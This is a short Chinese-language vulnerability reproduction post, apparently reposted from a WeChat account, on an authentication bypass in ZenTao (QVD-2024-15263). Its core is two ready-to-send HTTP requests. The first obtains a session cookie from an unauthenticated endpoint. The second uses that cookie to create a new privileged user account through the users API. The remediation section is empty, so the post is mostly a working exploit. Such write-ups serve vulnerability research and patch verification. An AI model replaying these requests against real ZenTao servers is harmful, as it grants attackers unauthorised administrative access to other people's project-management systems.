漏洞编号:
0X02 漏洞复现
GET /zentao/api.php?m=testcase&f=savexmindimport&HTTP_X_REQUESTED_WITH=XMLHttpRequest&productID=&branch= HTTP/1.1
Host: 192.168.31.132
获取zentaosid
POST /zentao/api.php/v1/users HTTP/1.1
Cookie: zentaosid=ceef15d311d3e922b18b29f9203261ad
Host: 192.168.31.132
Content-Length: 92
{"account": "test", "password": "1qaz@WSX", "realname": "test", "role": "top", "group": "1"}
替换获取的zentaosid,提示403账号添加成功。
0X03 修复建议
0X04
原文始发于微信公众号(皓月的笔记本):【漏洞复现】ZenTao(禅道)身份认证绕过漏洞(QVD-2024-15263)
- 左青龙
- 微信扫一扫
- 右白虎
- 微信扫一扫
评论